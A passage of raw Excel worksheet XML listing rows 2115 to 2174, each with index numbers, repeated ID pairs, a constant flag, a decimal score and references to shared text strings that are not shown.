        <v>4172</v>
      </c>
      <c r="H2115" t="s">
        <v>4173</v>
      </c>
    </row>
    <row r="2116" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2116" s="1">
        <v>2114</v>
      </c>
      <c r="B2116">
        <v>2422</v>
      </c>
      <c r="C2116">
        <v>2422</v>
      </c>
      <c r="D2116">
        <v>1</v>
      </c>
      <c r="E2116">
        <v>0.57059997320175171</v>
      </c>
      <c r="F2116" t="s">
        <v>3911</v>
      </c>
      <c r="G2116" t="s">
        <v>4174</v>
      </c>
      <c r="H2116" t="s">
        <v>4175</v>
      </c>
    </row>
    <row r="2117" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2117" s="1">
        <v>2115</v>
      </c>
      <c r="B2117">
        <v>3255</v>
      </c>
      <c r="C2117">
        <v>3255</v>
      </c>
      <c r="D2117">
        <v>1</v>
      </c>
      <c r="E2117">
        <v>0.53750002384185791</v>
      </c>
      <c r="F2117" t="s">
        <v>3911</v>
      </c>
      <c r="G2117" t="s">
        <v>4176</v>
      </c>
      <c r="H2117" t="s">
        <v>4177</v>
      </c>
    </row>
    <row r="2118" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2118" s="1">
        <v>2116</v>
      </c>
      <c r="B2118">
        <v>6839</v>
      </c>
      <c r="C2118">
        <v>6839</v>
      </c>
      <c r="D2118">
        <v>1</v>
      </c>
      <c r="E2118">
        <v>0.60159999132156372</v>
      </c>
      <c r="F2118" t="s">
        <v>3911</v>
      </c>
      <c r="G2118" t="s">
        <v>4178</v>
      </c>
      <c r="H2118" t="s">
        <v>4179</v>
      </c>
    </row>
    <row r="2119" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2119" s="1">
        <v>2117</v>
      </c>
      <c r="B2119">
        <v>2977</v>
      </c>
      <c r="C2119">
        <v>2977</v>
      </c>
      <c r="D2119">
        <v>1</v>
      </c>
      <c r="E2119">
        <v>0.58279997110366821</v>
      </c>
      <c r="F2119" t="s">
        <v>3911</v>
      </c>
      <c r="G2119" t="s">
        <v>4180</v>
      </c>
      <c r="H2119" t="s">
        <v>4181</v>
      </c>
    </row>
    <row r="2120" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2120" s="1">
        <v>2118</v>
      </c>
      <c r="B2120">
        <v>2430</v>
      </c>
      <c r="C2120">
        <v>2430</v>
      </c>
      <c r="D2120">
        <v>1</v>
      </c>
      <c r="E2120">
        <v>0.59140002727508545</v>
      </c>
      <c r="F2120" t="s">
        <v>3911</v>
      </c>
      <c r="G2120" t="s">
        <v>4182</v>
      </c>
      <c r="H2120" t="s">
        <v>4183</v>
      </c>
    </row>
    <row r="2121" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2121" s="1">
        <v>2119</v>
      </c>
      <c r="B2121">
        <v>4102</v>
      </c>
      <c r="C2121">
        <v>4102</v>
      </c>
      <c r="D2121">
        <v>1</v>
      </c>
      <c r="E2121">
        <v>0.80989998579025269</v>
      </c>
      <c r="F2121" t="s">
        <v>3911</v>
      </c>
      <c r="G2121" t="s">
        <v>4184</v>
      </c>
      <c r="H2121" t="s">
        <v>4185</v>
      </c>
    </row>
    <row r="2122" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2122" s="1">
        <v>2120</v>
      </c>
      <c r="B2122">
        <v>2432</v>
      </c>
      <c r="C2122">
        <v>2432</v>
      </c>
      <c r="D2122">
        <v>1</v>
      </c>
      <c r="E2122">
        <v>0.99169999361038208</v>
      </c>
      <c r="F2122" t="s">
        <v>3911</v>
      </c>
      <c r="G2122" t="s">
        <v>4186</v>
      </c>
      <c r="H2122" t="s">
        <v>4187</v>
      </c>
    </row>
    <row r="2123" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2123" s="1">
        <v>2121</v>
      </c>
      <c r="B2123">
        <v>6195</v>
      </c>
      <c r="C2123">
        <v>6195</v>
      </c>
      <c r="D2123">
        <v>1</v>
      </c>
      <c r="E2123">
        <v>0.99379998445510864</v>
      </c>
      <c r="F2123" t="s">
        <v>3911</v>
      </c>
      <c r="G2123" t="s">
        <v>4188</v>
      </c>
      <c r="H2123" t="s">
        <v>4189</v>
      </c>
    </row>
    <row r="2124" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2124" s="1">
        <v>2122</v>
      </c>
      <c r="B2124">
        <v>3137</v>
      </c>
      <c r="C2124">
        <v>3137</v>
      </c>
      <c r="D2124">
        <v>1</v>
      </c>
      <c r="E2124">
        <v>0.99910002946853638</v>
      </c>
      <c r="F2124" t="s">
        <v>3911</v>
      </c>
      <c r="G2124" t="s">
        <v>4190</v>
      </c>
      <c r="H2124" t="s">
        <v>4191</v>
      </c>
    </row>
    <row r="2125" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2125" s="1">
        <v>2123</v>
      </c>
      <c r="B2125">
        <v>3046</v>
      </c>
      <c r="C2125">
        <v>3046</v>
      </c>
      <c r="D2125">
        <v>1</v>
      </c>
      <c r="E2125">
        <v>0.99870002269744873</v>
      </c>
      <c r="F2125" t="s">
        <v>3911</v>
      </c>
      <c r="G2125" t="s">
        <v>4192</v>
      </c>
      <c r="H2125" t="s">
        <v>4193</v>
      </c>
    </row>
    <row r="2126" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2126" s="1">
        <v>2124</v>
      </c>
      <c r="B2126">
        <v>2734</v>
      </c>
      <c r="C2126">
        <v>2734</v>
      </c>
      <c r="D2126">
        <v>1</v>
      </c>
      <c r="E2126">
        <v>0.99639999866485596</v>
      </c>
      <c r="F2126" t="s">
        <v>3911</v>
      </c>
      <c r="G2126" t="s">
        <v>4194</v>
      </c>
      <c r="H2126" t="s">
        <v>4195</v>
      </c>
    </row>
    <row r="2127" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2127" s="1">
        <v>2125</v>
      </c>
      <c r="B2127">
        <v>658</v>
      </c>
      <c r="C2127">
        <v>658</v>
      </c>
      <c r="D2127">
        <v>1</v>
      </c>
      <c r="E2127">
        <v>0.97450000047683716</v>
      </c>
      <c r="F2127" t="s">
        <v>3911</v>
      </c>
      <c r="G2127" t="s">
        <v>4196</v>
      </c>
      <c r="H2127" t="s">
        <v>4197</v>
      </c>
    </row>
    <row r="2128" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2128" s="1">
        <v>2126</v>
      </c>
      <c r="B2128">
        <v>7704</v>
      </c>
      <c r="C2128">
        <v>7704</v>
      </c>
      <c r="D2128">
        <v>1</v>
      </c>
      <c r="E2128">
        <v>0.99070000648498535</v>
      </c>
      <c r="F2128" t="s">
        <v>3911</v>
      </c>
      <c r="G2128" t="s">
        <v>4198</v>
      </c>
      <c r="H2128" t="s">
        <v>4199</v>
      </c>
    </row>
    <row r="2129" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2129" s="1">
        <v>2127</v>
      </c>
      <c r="B2129">
        <v>2983</v>
      </c>
      <c r="C2129">
        <v>2983</v>
      </c>
      <c r="D2129">
        <v>1</v>
      </c>
      <c r="E2129">
        <v>0.50789999961853027</v>
      </c>
      <c r="F2129" t="s">
        <v>3911</v>
      </c>
      <c r="G2129" t="s">
        <v>4200</v>
      </c>
      <c r="H2129" t="s">
        <v>4201</v>
      </c>
    </row>
    <row r="2130" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2130" s="1">
        <v>2128</v>
      </c>
      <c r="B2130">
        <v>2741</v>
      </c>
      <c r="C2130">
        <v>2741</v>
      </c>
      <c r="D2130">
        <v>1</v>
      </c>
      <c r="E2130">
        <v>0.76349997520446777</v>
      </c>
      <c r="F2130" t="s">
        <v>3911</v>
      </c>
      <c r="G2130" t="s">
        <v>4202</v>
      </c>
      <c r="H2130" t="s">
        <v>3959</v>
      </c>
    </row>
    <row r="2131" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2131" s="1">
        <v>2129</v>
      </c>
      <c r="B2131">
        <v>2991</v>
      </c>
      <c r="C2131">
        <v>2991</v>
      </c>
      <c r="D2131">
        <v>1</v>
      </c>
      <c r="E2131">
        <v>0.49689999222755432</v>
      </c>
      <c r="F2131" t="s">
        <v>3911</v>
      </c>
      <c r="G2131" t="s">
        <v>4203</v>
      </c>
      <c r="H2131" t="s">
        <v>4204</v>
      </c>
    </row>
    <row r="2132" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2132" s="1">
        <v>2130</v>
      </c>
      <c r="B2132">
        <v>4295</v>
      </c>
      <c r="C2132">
        <v>4295</v>
      </c>
      <c r="D2132">
        <v>1</v>
      </c>
      <c r="E2132">
        <v>0.58289998769760132</v>
      </c>
      <c r="F2132" t="s">
        <v>3911</v>
      </c>
      <c r="G2132" t="s">
        <v>4205</v>
      </c>
      <c r="H2132" t="s">
        <v>4206</v>
      </c>
    </row>
    <row r="2133" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2133" s="1">
        <v>2131</v>
      </c>
      <c r="B2133">
        <v>5441</v>
      </c>
      <c r="C2133">
        <v>5441</v>
      </c>
      <c r="D2133">
        <v>1</v>
      </c>
      <c r="E2133">
        <v>0.38890001177787781</v>
      </c>
      <c r="F2133" t="s">
        <v>3911</v>
      </c>
      <c r="G2133" t="s">
        <v>4207</v>
      </c>
      <c r="H2133" t="s">
        <v>4208</v>
      </c>
    </row>
    <row r="2134" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2134" s="1">
        <v>2132</v>
      </c>
      <c r="B2134">
        <v>3136</v>
      </c>
      <c r="C2134">
        <v>3136</v>
      </c>
      <c r="D2134">
        <v>1</v>
      </c>
      <c r="E2134">
        <v>0.99860000610351563</v>
      </c>
      <c r="F2134" t="s">
        <v>3911</v>
      </c>
      <c r="G2134" t="s">
        <v>4209</v>
      </c>
      <c r="H2134" t="s">
        <v>4210</v>
      </c>
    </row>
    <row r="2135" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2135" s="1">
        <v>2133</v>
      </c>
      <c r="B2135">
        <v>3039</v>
      </c>
      <c r="C2135">
        <v>3039</v>
      </c>
      <c r="D2135">
        <v>1</v>
      </c>
      <c r="E2135">
        <v>0.59259998798370361</v>
      </c>
      <c r="F2135" t="s">
        <v>3911</v>
      </c>
      <c r="G2135" t="s">
        <v>4211</v>
      </c>
      <c r="H2135" t="s">
        <v>4212</v>
      </c>
    </row>
    <row r="2136" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2136" s="1">
        <v>2134</v>
      </c>
      <c r="B2136">
        <v>5374</v>
      </c>
      <c r="C2136">
        <v>5374</v>
      </c>
      <c r="D2136">
        <v>1</v>
      </c>
      <c r="E2136">
        <v>0.95149999856948853</v>
      </c>
      <c r="F2136" t="s">
        <v>3911</v>
      </c>
      <c r="G2136" t="s">
        <v>4213</v>
      </c>
      <c r="H2136" t="s">
        <v>4214</v>
      </c>
    </row>
    <row r="2137" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2137" s="1">
        <v>2135</v>
      </c>
      <c r="B2137">
        <v>6255</v>
      </c>
      <c r="C2137">
        <v>6255</v>
      </c>
      <c r="D2137">
        <v>1</v>
      </c>
      <c r="E2137">
        <v>0.58569997549057007</v>
      </c>
      <c r="F2137" t="s">
        <v>3911</v>
      </c>
      <c r="G2137" t="s">
        <v>4215</v>
      </c>
      <c r="H2137" t="s">
        <v>4216</v>
      </c>
    </row>
    <row r="2138" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2138" s="1">
        <v>2136</v>
      </c>
      <c r="B2138">
        <v>247</v>
      </c>
      <c r="C2138">
        <v>247</v>
      </c>
      <c r="D2138">
        <v>1</v>
      </c>
      <c r="E2138">
        <v>0.58910000324249268</v>
      </c>
      <c r="F2138" t="s">
        <v>3911</v>
      </c>
      <c r="G2138" t="s">
        <v>4217</v>
      </c>
      <c r="H2138" t="s">
        <v>4218</v>
      </c>
    </row>
    <row r="2139" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2139" s="1">
        <v>2137</v>
      </c>
      <c r="B2139">
        <v>3963</v>
      </c>
      <c r="C2139">
        <v>3963</v>
      </c>
      <c r="D2139">
        <v>1</v>
      </c>
      <c r="E2139">
        <v>0.99910002946853638</v>
      </c>
      <c r="F2139" t="s">
        <v>3911</v>
      </c>
      <c r="G2139" t="s">
        <v>4219</v>
      </c>
      <c r="H2139" t="s">
        <v>4220</v>
      </c>
    </row>
    <row r="2140" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2140" s="1">
        <v>2138</v>
      </c>
      <c r="B2140">
        <v>5302</v>
      </c>
      <c r="C2140">
        <v>5302</v>
      </c>
      <c r="D2140">
        <v>1</v>
      </c>
      <c r="E2140">
        <v>0.55849999189376831</v>
      </c>
      <c r="F2140" t="s">
        <v>3911</v>
      </c>
      <c r="G2140" t="s">
        <v>4221</v>
      </c>
      <c r="H2140" t="s">
        <v>4222</v>
      </c>
    </row>
    <row r="2141" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2141" s="1">
        <v>2139</v>
      </c>
      <c r="B2141">
        <v>527</v>
      </c>
      <c r="C2141">
        <v>527</v>
      </c>
      <c r="D2141">
        <v>1</v>
      </c>
      <c r="E2141">
        <v>0.99970000982284546</v>
      </c>
      <c r="F2141" t="s">
        <v>3911</v>
      </c>
      <c r="G2141" t="s">
        <v>4223</v>
      </c>
      <c r="H2141" t="s">
        <v>4224</v>
      </c>
    </row>
    <row r="2142" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2142" s="1">
        <v>2140</v>
      </c>
      <c r="B2142">
        <v>4290</v>
      </c>
      <c r="C2142">
        <v>4290</v>
      </c>
      <c r="D2142">
        <v>1</v>
      </c>
      <c r="E2142">
        <v>0.98610001802444458</v>
      </c>
      <c r="F2142" t="s">
        <v>3911</v>
      </c>
      <c r="G2142" t="s">
        <v>4225</v>
      </c>
      <c r="H2142" t="s">
        <v>4226</v>
      </c>
    </row>
    <row r="2143" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2143" s="1">
        <v>2141</v>
      </c>
      <c r="B2143">
        <v>5222</v>
      </c>
      <c r="C2143">
        <v>5222</v>
      </c>
      <c r="D2143">
        <v>1</v>
      </c>
      <c r="E2143">
        <v>0.99620002508163452</v>
      </c>
      <c r="F2143" t="s">
        <v>3911</v>
      </c>
      <c r="G2143" t="s">
        <v>4227</v>
      </c>
      <c r="H2143" t="s">
        <v>4228</v>
      </c>
    </row>
    <row r="2144" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2144" s="1">
        <v>2142</v>
      </c>
      <c r="B2144">
        <v>515</v>
      </c>
      <c r="C2144">
        <v>515</v>
      </c>
      <c r="D2144">
        <v>1</v>
      </c>
      <c r="E2144">
        <v>0.64020001888275146</v>
      </c>
      <c r="F2144" t="s">
        <v>3911</v>
      </c>
      <c r="G2144" t="s">
        <v>4229</v>
      </c>
      <c r="H2144" t="s">
        <v>4230</v>
      </c>
    </row>
    <row r="2145" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2145" s="1">
        <v>2143</v>
      </c>
      <c r="B2145">
        <v>231</v>
      </c>
      <c r="C2145">
        <v>231</v>
      </c>
      <c r="D2145">
        <v>1</v>
      </c>
      <c r="E2145">
        <v>0.61330002546310425</v>
      </c>
      <c r="F2145" t="s">
        <v>3911</v>
      </c>
      <c r="G2145" t="s">
        <v>4231</v>
      </c>
      <c r="H2145" t="s">
        <v>4232</v>
      </c>
    </row>
    <row r="2146" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2146" s="1">
        <v>2144</v>
      </c>
      <c r="B2146">
        <v>2419</v>
      </c>
      <c r="C2146">
        <v>2419</v>
      </c>
      <c r="D2146">
        <v>1</v>
      </c>
      <c r="E2146">
        <v>0.65299999713897705</v>
      </c>
      <c r="F2146" t="s">
        <v>3911</v>
      </c>
      <c r="G2146" t="s">
        <v>4233</v>
      </c>
      <c r="H2146" t="s">
        <v>4234</v>
      </c>
    </row>
    <row r="2147" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2147" s="1">
        <v>2145</v>
      </c>
      <c r="B2147">
        <v>5673</v>
      </c>
      <c r="C2147">
        <v>5673</v>
      </c>
      <c r="D2147">
        <v>1</v>
      </c>
      <c r="E2147">
        <v>0.98720002174377441</v>
      </c>
      <c r="F2147" t="s">
        <v>3911</v>
      </c>
      <c r="G2147" t="s">
        <v>4235</v>
      </c>
      <c r="H2147" t="s">
        <v>4236</v>
      </c>
    </row>
    <row r="2148" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2148" s="1">
        <v>2146</v>
      </c>
      <c r="B2148">
        <v>6199</v>
      </c>
      <c r="C2148">
        <v>6199</v>
      </c>
      <c r="D2148">
        <v>1</v>
      </c>
      <c r="E2148">
        <v>0.99910002946853638</v>
      </c>
      <c r="F2148" t="s">
        <v>3911</v>
      </c>
      <c r="G2148" t="s">
        <v>4237</v>
      </c>
      <c r="H2148" t="s">
        <v>4238</v>
      </c>
    </row>
    <row r="2149" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2149" s="1">
        <v>2147</v>
      </c>
      <c r="B2149">
        <v>6812</v>
      </c>
      <c r="C2149">
        <v>6812</v>
      </c>
      <c r="D2149">
        <v>1</v>
      </c>
      <c r="E2149">
        <v>0.82260000705718994</v>
      </c>
      <c r="F2149" t="s">
        <v>3911</v>
      </c>
      <c r="G2149" t="s">
        <v>4239</v>
      </c>
      <c r="H2149" t="s">
        <v>4240</v>
      </c>
    </row>
    <row r="2150" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2150" s="1">
        <v>2148</v>
      </c>
      <c r="B2150">
        <v>3922</v>
      </c>
      <c r="C2150">
        <v>3922</v>
      </c>
      <c r="D2150">
        <v>1</v>
      </c>
      <c r="E2150">
        <v>0.89340001344680786</v>
      </c>
      <c r="F2150" t="s">
        <v>3911</v>
      </c>
      <c r="G2150" t="s">
        <v>4241</v>
      </c>
      <c r="H2150" t="s">
        <v>4242</v>
      </c>
    </row>
    <row r="2151" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2151" s="1">
        <v>2149</v>
      </c>
      <c r="B2151">
        <v>6810</v>
      </c>
      <c r="C2151">
        <v>6810</v>
      </c>
      <c r="D2151">
        <v>1</v>
      </c>
      <c r="E2151">
        <v>0.99650001525878906</v>
      </c>
      <c r="F2151" t="s">
        <v>3911</v>
      </c>
      <c r="G2151" t="s">
        <v>4243</v>
      </c>
      <c r="H2151" t="s">
        <v>4244</v>
      </c>
    </row>
    <row r="2152" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2152" s="1">
        <v>2150</v>
      </c>
      <c r="B2152">
        <v>2584</v>
      </c>
      <c r="C2152">
        <v>2584</v>
      </c>
      <c r="D2152">
        <v>1</v>
      </c>
      <c r="E2152">
        <v>0.7006000280380249</v>
      </c>
      <c r="F2152" t="s">
        <v>3911</v>
      </c>
      <c r="G2152" t="s">
        <v>4245</v>
      </c>
      <c r="H2152" t="s">
        <v>4246</v>
      </c>
    </row>
    <row r="2153" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2153" s="1">
        <v>2151</v>
      </c>
      <c r="B2153">
        <v>2585</v>
      </c>
      <c r="C2153">
        <v>2585</v>
      </c>
      <c r="D2153">
        <v>1</v>
      </c>
      <c r="E2153">
        <v>0.73890000581741333</v>
      </c>
      <c r="F2153" t="s">
        <v>3911</v>
      </c>
      <c r="G2153" t="s">
        <v>4247</v>
      </c>
      <c r="H2153" t="s">
        <v>4248</v>
      </c>
    </row>
    <row r="2154" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2154" s="1">
        <v>2152</v>
      </c>
      <c r="B2154">
        <v>2586</v>
      </c>
      <c r="C2154">
        <v>2586</v>
      </c>
      <c r="D2154">
        <v>1</v>
      </c>
      <c r="E2154">
        <v>0.61729997396469116</v>
      </c>
      <c r="F2154" t="s">
        <v>3911</v>
      </c>
      <c r="G2154" t="s">
        <v>4249</v>
      </c>
      <c r="H2154" t="s">
        <v>4250</v>
      </c>
    </row>
    <row r="2155" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2155" s="1">
        <v>2153</v>
      </c>
      <c r="B2155">
        <v>2870</v>
      </c>
      <c r="C2155">
        <v>2870</v>
      </c>
      <c r="D2155">
        <v>1</v>
      </c>
      <c r="E2155">
        <v>0.99830001592636108</v>
      </c>
      <c r="F2155" t="s">
        <v>3911</v>
      </c>
      <c r="G2155" t="s">
        <v>4251</v>
      </c>
      <c r="H2155" t="s">
        <v>4252</v>
      </c>
    </row>
    <row r="2156" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2156" s="1">
        <v>2154</v>
      </c>
      <c r="B2156">
        <v>2829</v>
      </c>
      <c r="C2156">
        <v>2829</v>
      </c>
      <c r="D2156">
        <v>1</v>
      </c>
      <c r="E2156">
        <v>0.99889999628067017</v>
      </c>
      <c r="F2156" t="s">
        <v>3911</v>
      </c>
      <c r="G2156" t="s">
        <v>4253</v>
      </c>
      <c r="H2156" t="s">
        <v>4254</v>
      </c>
    </row>
    <row r="2157" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2157" s="1">
        <v>2155</v>
      </c>
      <c r="B2157">
        <v>5654</v>
      </c>
      <c r="C2157">
        <v>5654</v>
      </c>
      <c r="D2157">
        <v>1</v>
      </c>
      <c r="E2157">
        <v>0.99900001287460327</v>
      </c>
      <c r="F2157" t="s">
        <v>3911</v>
      </c>
      <c r="G2157" t="s">
        <v>4255</v>
      </c>
      <c r="H2157" t="s">
        <v>4256</v>
      </c>
    </row>
    <row r="2158" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2158" s="1">
        <v>2156</v>
      </c>
      <c r="B2158">
        <v>4208</v>
      </c>
      <c r="C2158">
        <v>4208</v>
      </c>
      <c r="D2158">
        <v>1</v>
      </c>
      <c r="E2158">
        <v>0.83600002527236938</v>
      </c>
      <c r="F2158" t="s">
        <v>3911</v>
      </c>
      <c r="G2158" t="s">
        <v>4257</v>
      </c>
      <c r="H2158" t="s">
        <v>4258</v>
      </c>
    </row>
    <row r="2159" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2159" s="1">
        <v>2157</v>
      </c>
      <c r="B2159">
        <v>2592</v>
      </c>
      <c r="C2159">
        <v>2592</v>
      </c>
      <c r="D2159">
        <v>1</v>
      </c>
      <c r="E2159">
        <v>0.76550000905990601</v>
      </c>
      <c r="F2159" t="s">
        <v>3911</v>
      </c>
      <c r="G2159" t="s">
        <v>4259</v>
      </c>
      <c r="H2159" t="s">
        <v>4260</v>
      </c>
    </row>
    <row r="2160" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2160" s="1">
        <v>2158</v>
      </c>
      <c r="B2160">
        <v>2679</v>
      </c>
      <c r="C2160">
        <v>2679</v>
      </c>
      <c r="D2160">
        <v>1</v>
      </c>
      <c r="E2160">
        <v>0.98650002479553223</v>
      </c>
      <c r="F2160" t="s">
        <v>3911</v>
      </c>
      <c r="G2160" t="s">
        <v>4261</v>
      </c>
      <c r="H2160" t="s">
        <v>4262</v>
      </c>
    </row>
    <row r="2161" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2161" s="1">
        <v>2159</v>
      </c>
      <c r="B2161">
        <v>4206</v>
      </c>
      <c r="C2161">
        <v>4206</v>
      </c>
      <c r="D2161">
        <v>1</v>
      </c>
      <c r="E2161">
        <v>0.60799998044967651</v>
      </c>
      <c r="F2161" t="s">
        <v>3911</v>
      </c>
      <c r="G2161" t="s">
        <v>4263</v>
      </c>
      <c r="H2161" t="s">
        <v>4264</v>
      </c>
    </row>
    <row r="2162" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2162" s="1">
        <v>2160</v>
      </c>
      <c r="B2162">
        <v>2868</v>
      </c>
      <c r="C2162">
        <v>2868</v>
      </c>
      <c r="D2162">
        <v>1</v>
      </c>
      <c r="E2162">
        <v>0.99900001287460327</v>
      </c>
      <c r="F2162" t="s">
        <v>3911</v>
      </c>
      <c r="G2162" t="s">
        <v>4265</v>
      </c>
      <c r="H2162" t="s">
        <v>4266</v>
      </c>
    </row>
    <row r="2163" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2163" s="1">
        <v>2161</v>
      </c>
      <c r="B2163">
        <v>2595</v>
      </c>
      <c r="C2163">
        <v>2595</v>
      </c>
      <c r="D2163">
        <v>1</v>
      </c>
      <c r="E2163">
        <v>0.62709999084472656</v>
      </c>
      <c r="F2163" t="s">
        <v>3911</v>
      </c>
      <c r="G2163" t="s">
        <v>4267</v>
      </c>
      <c r="H2163" t="s">
        <v>4268</v>
      </c>
    </row>
    <row r="2164" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2164" s="1">
        <v>2162</v>
      </c>
      <c r="B2164">
        <v>277</v>
      </c>
      <c r="C2164">
        <v>277</v>
      </c>
      <c r="D2164">
        <v>1</v>
      </c>
      <c r="E2164">
        <v>0.62699997425079346</v>
      </c>
      <c r="F2164" t="s">
        <v>3911</v>
      </c>
      <c r="G2164" t="s">
        <v>4269</v>
      </c>
      <c r="H2164" t="s">
        <v>4270</v>
      </c>
    </row>
    <row r="2165" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2165" s="1">
        <v>2163</v>
      </c>
      <c r="B2165">
        <v>2597</v>
      </c>
      <c r="C2165">
        <v>2597</v>
      </c>
      <c r="D2165">
        <v>1</v>
      </c>
      <c r="E2165">
        <v>0.99040001630783081</v>
      </c>
      <c r="F2165" t="s">
        <v>3911</v>
      </c>
      <c r="G2165" t="s">
        <v>4271</v>
      </c>
      <c r="H2165" t="s">
        <v>4272</v>
      </c>
    </row>
    <row r="2166" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2166" s="1">
        <v>2164</v>
      </c>
      <c r="B2166">
        <v>5714</v>
      </c>
      <c r="C2166">
        <v>5714</v>
      </c>
      <c r="D2166">
        <v>1</v>
      </c>
      <c r="E2166">
        <v>0.99879997968673706</v>
      </c>
      <c r="F2166" t="s">
        <v>3911</v>
      </c>
      <c r="G2166" t="s">
        <v>4273</v>
      </c>
      <c r="H2166" t="s">
        <v>4274</v>
      </c>
    </row>
    <row r="2167" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2167" s="1">
        <v>2165</v>
      </c>
      <c r="B2167">
        <v>7777</v>
      </c>
      <c r="C2167">
        <v>7777</v>
      </c>
      <c r="D2167">
        <v>1</v>
      </c>
      <c r="E2167">
        <v>0.99419999122619629</v>
      </c>
      <c r="F2167" t="s">
        <v>3911</v>
      </c>
      <c r="G2167" t="s">
        <v>4275</v>
      </c>
      <c r="H2167" t="s">
        <v>4276</v>
      </c>
    </row>
    <row r="2168" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2168" s="1">
        <v>2166</v>
      </c>
      <c r="B2168">
        <v>4145</v>
      </c>
      <c r="C2168">
        <v>4145</v>
      </c>
      <c r="D2168">
        <v>1</v>
      </c>
      <c r="E2168">
        <v>0.47350001335144037</v>
      </c>
      <c r="F2168" t="s">
        <v>3911</v>
      </c>
      <c r="G2168" t="s">
        <v>4277</v>
      </c>
      <c r="H2168" t="s">
        <v>4278</v>
      </c>
    </row>
    <row r="2169" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2169" s="1">
        <v>2167</v>
      </c>
      <c r="B2169">
        <v>4204</v>
      </c>
      <c r="C2169">
        <v>4204</v>
      </c>
      <c r="D2169">
        <v>1</v>
      </c>
      <c r="E2169">
        <v>0.93040001392364502</v>
      </c>
      <c r="F2169" t="s">
        <v>3911</v>
      </c>
      <c r="G2169" t="s">
        <v>4279</v>
      </c>
      <c r="H2169" t="s">
        <v>4280</v>
      </c>
    </row>
    <row r="2170" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2170" s="1">
        <v>2168</v>
      </c>
      <c r="B2170">
        <v>4201</v>
      </c>
      <c r="C2170">
        <v>4201</v>
      </c>
      <c r="D2170">
        <v>1</v>
      </c>
      <c r="E2170">
        <v>0.61150002479553223</v>
      </c>
      <c r="F2170" t="s">
        <v>3911</v>
      </c>
      <c r="G2170" t="s">
        <v>4281</v>
      </c>
      <c r="H2170" t="s">
        <v>4282</v>
      </c>
    </row>
    <row r="2171" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2171" s="1">
        <v>2169</v>
      </c>
      <c r="B2171">
        <v>4200</v>
      </c>
      <c r="C2171">
        <v>4200</v>
      </c>
      <c r="D2171">
        <v>1</v>
      </c>
      <c r="E2171">
        <v>0.99599999189376831</v>
      </c>
      <c r="F2171" t="s">
        <v>3911</v>
      </c>
      <c r="G2171" t="s">
        <v>4283</v>
      </c>
      <c r="H2171" t="s">
        <v>4284</v>
      </c>
    </row>
    <row r="2172" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2172" s="1">
        <v>2170</v>
      </c>
      <c r="B2172">
        <v>5290</v>
      </c>
      <c r="C2172">
        <v>5290</v>
      </c>
      <c r="D2172">
        <v>1</v>
      </c>
      <c r="E2172">
        <v>0.99800002574920654</v>
      </c>
      <c r="F2172" t="s">
        <v>3911</v>
      </c>
      <c r="G2172" t="s">
        <v>4285</v>
      </c>
      <c r="H2172" t="s">
        <v>4286</v>
      </c>
    </row>
    <row r="2173" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2173" s="1">
        <v>2171</v>
      </c>
      <c r="B2173">
        <v>2871</v>
      </c>
      <c r="C2173">
        <v>2871</v>
      </c>
      <c r="D2173">
        <v>1</v>
      </c>
      <c r="E2173">
        <v>0.70410001277923584</v>
      </c>
      <c r="F2173" t="s">
        <v>3911</v>
      </c>
      <c r="G2173" t="s">
        <v>4287</v>
      </c>
      <c r="H2173" t="s">
        <v>4288</v>
      </c>
    </row>
    <row r="2174" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2174" s="1">
        <v>2172</v>
